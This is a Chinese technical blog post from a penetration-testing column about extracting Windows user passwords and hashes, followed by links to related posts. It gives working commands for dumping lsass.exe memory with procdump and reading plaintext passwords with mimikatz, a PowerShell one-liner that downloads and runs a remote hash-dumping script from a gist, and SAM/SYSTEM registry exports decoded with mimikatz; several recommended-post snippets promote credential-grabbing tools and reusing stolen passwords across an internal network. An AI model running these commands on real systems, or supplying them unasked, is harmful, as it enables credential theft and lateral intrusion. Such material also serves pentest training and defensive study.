windows抓取用户密码

最新推荐文章于 2024-05-31 22:11:23 发布
最新推荐文章于 2024-05-31 22:11:23 发布
阅读量3.9k 收藏 22
点赞数 3
分类专栏: 渗透测试 文章标签: 渗透 渗透测试 入侵教材 网络安全 web入侵 安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/w1590191166/article/details/107350200
版权

前言

windows环境下,一般推荐用procdump配合mimikatz来读取密码。

  • 使用procdump的原因是微软官方的,不容易出问题
  • 另外还有种方法就是通过powershell来导出,在使用工具不方便时候可以采取该方法

基础知识

windows sam文件

windows的用户hash一般是存储在C:\windows\system32\config\SAM文件中(域控存在NTDS.dit文件中),只不过,就算是管理员权限,也是无法正常打开并读取文件内容,因此一般无法直接通过SAM文件获取用户hash。
可以通过reg save命令通过SAM文件dump出文件再使用mimikatz导出hash,详情后文会阐述。

lsass.exe进程

lsass.exe是一个系统进程,用于本地安全认证,用户的hash信息就存在lsass.exe程序内存中。我们一般就是以lsass.exe进程为目标,使用工具从该进程中dump出已登录用户的hash相关信息

用户hash构成

既然要获取用户hash,肯定需要了解hash组成及其含义:

用户名称:RID:LM-HASH值:NTLM-HASH值
  • 其中,NTLM-HASH比LM-HASH的安全性要更高
  • Windows VistaWindows Server 2008开始,Windows取消LM hash。
  • 当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码

LM-HASH和NTLM-HASH

LM-HASH主要经过大写转换,位数补全和DES加密等运算,最终生成一个32位字符串。
NTLM-HASH主要经过格式转换和MD4等运算,最终也是生成一个32位字符串。
在此不对具体算法进行深入研究,需要知道的是两者的运用环境:

  • LM-HASH:
  • NTLM-HASH:

0X01 procdump+mimikatz读取密码

  1. https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump下载procdump。
    在这里插入图片描述
  2. 使用管理员权限运行cmd,切换到procdump所在目录,运行procdump64.exe -accepteula -ma lsass.exe lsass.dmp命令,从lsass.exe进程的内存中dump出用户账户和密码,并转储为离线版的lsass.dmp。
    在这里插入图片描述
  3. 把lsass.dmp复制到mimikatz所在目录读用户密码,同样管理员权限开启cmd,执行以下命令,即可读取用户账号及明文密码
mimikatz
privilege::debug
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

在这里插入图片描述

0x02 使用powershell读取密码

使用powershell读取密码的原理和第一种类似,也是从lsass.exe进程中读取,需要管理员权限运行cmd,调用powershell。
powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/ATpiu/d656f76a7a93209ccfec2748fb71b9b7/raw/3ea13924b32d42d737a8ba058cea24cba81f10ec/Get-PassHashes.ps1');Get-PassHashes
在这里插入图片描述

0x03 通过SAM文件+mimikatz读取密码

  1. 导出导出SAM和System文件
reg save HKLM\SYSTEM sys.hiv 
reg save HKLM\SAM sam.hiv
  1. 将上述获得的sys.hiv和sam.hiv文件复制到mimikatz所在文件夹,运行mimikatz,输入lsadump::sam /system:sys.hiv /sam:sam.hiv,即可导出所有用户密码hash
    在这里插入图片描述
ATpiu
关注
  • 3
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
mimikatz(windows 明文密码抓取工具)
04-02
windows 明文密码抓取工具,分别有32位和64位版本,在XP和win 7 旗舰版上测试成功
获取当前系统用户登录密码
11-17
可以获取当前Windows用户的登录密码。附C++源码
windows密码获取
07-29 2294
概述 渗透测试过程中对于windows 系统中的密码获取是十分重要的一步,获取密码后我们可以对内网中其他机器进行撞库,快速、批量拿下其他服务器权限。 windows密码获取方法 最主流的获取windows 密码的方法最主流的方法有三种,mimikatz 直接执行获取;procdump + mimikatz 进行获取;读取注册表进行获取 + mimikatz 解密进行获取。 使用这三种方式的前提是必须在管理员的权限下进行执行命令,不然执行会失败。 mimikatz直接获取 直接将mimikatz 上传到
cs与msf权限传递,以及mimikatz抓取win2012明文密码
最新发布
qq_64395221的博客
05-31 332
环境搭建:攻击IP :10.11.17.22(kali cs服务端、msf所在主机)靶机IP:10.11.73.53(Windows2012)
Windows开机账户与密码获取工具
11-23
抓取Windows电脑开机用户名和密码,包括历史登录的账号及密码,工具中附有详细操作命令,操作简便。
国外的windows密码获取工具
09-05
直接运行exe可获得命令 --output 路径+文件名可以导出数据。
Mimikatz Windows 密码抓取神器
05-27
这款工具因其强大的密码抓取能力而闻名,可以提取出系统内存中的明文密码、哈希值以及其他敏感凭证,从而帮助安全研究人员检测系统的漏洞和防护措施。 在Windows环境中,Mimikatz 能够执行以下关键功能: 1. **LSA...
mimikatz 抓取 Windows 明文密码
06-02
Mimikatz - Windows 密码抓取神器 轻量级调试器神器 - mimikatz - 直接抓取 Windows 明文密码! 这个神器的功能肯定不仅仅如此 在我看来它更像一个轻量级调试器 可以提升进程权限 注入进程 读取
密码抓取神器
06-10
密码抓取神器】是一款由国外技术大神开发的专业级软件,主要针对Windows操作系统,用于密码的捕获和分析。这款工具的出现,为网络安全研究人员、渗透测试人员以及系统管理员提供了一种有效的手段来了解系统中密码...
Windows抓取密码的四种方式&&其他各类密码抓取
huohaowen的博客
03-22 2547
对于Windows(不是域环境)我们有四种方法去抓取它的密码在这次的blog,我们还是用的mimkatz。
Windows明文密码获取器 v2.0
04-24 201
软件原理:本软件根据开源工具mimikatz2.0 修改! 软件能直接读取系统明文密码! 支持32位、64位系统 win xp/vista/7/8/8.1 软件已经加壳,报毒为正常现象,如不能获取,请管理员运行! 更新:针对1.0 更新了 ,无法读取密码BUG 请勿用于非法用途! 下载地址:http://pan.baidu.com/s/1jHKcMWm ...
windows密码抓取的多种方法
nex1less的博客
11-26 4000
0x01 准备阶段 1.下载pwdump7: 链接:https://pan.baidu.com/s/1zhSJTNnAl43BHblWU3nI5A 提取码:f74o 解压密码:321 (为啥有解压密码:因为百度云盘不让分享此文件 只好加了个密码) 2.下载hashcat: 链接:https://pan.baidu.com/s/12uoeUrqVQ-Gg7xU1V7fGPQ ...
内网渗透之linux&windows密码读取&haschcat破解&ssh&rdp
m0_62207170的博客
05-12 1561
内网渗透之linux&windows密码读取&haschcat破解&ssh&rdp
Solaris10用户密码四种状态转换
weixin_30339969的博客
02-13 555
在Solaris10中用户密码状态主要有四种,分别是PS、NL、LK、NP。 PS:表示用户密码已设置。 NL:表示用户帐号是不可登录帐号。 LK:表示用户已被锁定。 NP:表示用户没有密码,登录时不需要密码认证。 使用passwd -s username 命令可以查看用户帐号的密码状态。 下面看看几种状态的区别: 1. NL与LK的区别 LK是表示...
windows认证&密码抓取
qq_44657899的博客
07-15 6204
文章目录基础知识windows版本历史一、工作组部分密码存放在哪里?NTML Hashwindows本地认证windows网络认证NTML v1与v2二、域部分kerbero协议白银票据黄金票据windows密码导出lsass进程抓取mimikatz直接操作lsass进程procdump+mimikatzWindows Server 2016抓取明文密码sam文件(密文,需要破解,或者通过hash传递使用)用工具读取sam文件注册表导出sam文件使用mimipenguin获取linux明文登录密码windo
导出lsass内存各种方法
qq_18193739的博客
08-08 1293
导出lsass内存各种方法,mimikatz读取密码
Windows获取密码及hash
LuckySec
05-04 3384
前言 在拿到一台 Windows 的管理员权限以后,可以通过多种方法获取 Windows 系统的明文密码或者 hash 值,这将有利于我们在内网中扩大渗透范围。 0x01 Mimikatz Mimikat是一个法国人写的轻量级调试器。Mimikat可以从内存中提取纯文本密码,hash,PIN码和kerberos票证。 下载地址:https://github.com/gentilkiwi/mimikatz 将Mimikatz上传至受害目标系统上,然后执行如下命令: # cmd命令执行启动程序 mimika
[青少年CTF]-MISC WP(一)
qq_45524026的博客
03-14 1789
[青少年CTF]-MISC WP(一)
如何破解Windows密码[LM/NTLMv2介绍]
xcntime的专栏
12-02 7628
如何破解Windows密码[LM/NTLMv2介绍]<br />原创文章如转载,请注明:转载自冠威博客 [ http://www.guanwei.org/ ] <br />本文链接地址:http://www.guanwei.org/post/platformsecurity/06/windows-LM-NTLMv2.html<br />密码可以看作我们主要,甚至某些情况下唯一可用于防范入侵的防线。就算入侵者无法在物理上接触到计算机,对于对外的Web应用,他们依然可以通过远程桌面协议或身份验证功能访问到服务器
windows用户密码查看器
11-16
Windows用户密码查看器是一种用于查看Windows操作系统中用户账户的密码的工具。它通常是一款第三方软件,可以在没有用户权限限制的情况下获取密码的明文。 使用Windows用户密码查看器可以帮助用户找回自己忘记的密码,或者在需要时查看其他用户密码。但是需要注意的是,这种工具可能会被滥用,因此使用它时需要谨慎,并遵守相关法律法规和道德准则。 在使用Windows用户密码查看器之前,用户需要下载并安装该软件。一旦安装完成,用户可以运行该程序并选择需要查看密码用户账户。通过简单的操作,用户就可以获得用户账户的密码明文。 但是,用户密码的隐私和安全性是非常重要的。为了保护用户的个人信息和数据安全,在日常使用电脑时,用户应该养成良好的密码管理习惯,选择强密码,并定期更改密码。此外,不要随意下载和安装第三方软件,以防止个人密码被恶意窃取。 总之,Windows用户密码查看器是一款帮助用户查看Windows操作系统中用户账户密码的工具。但使用该工具需要谨慎,遵守相关法律法规和道德准则,同时保护好自己的密码隐私和数据安全
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值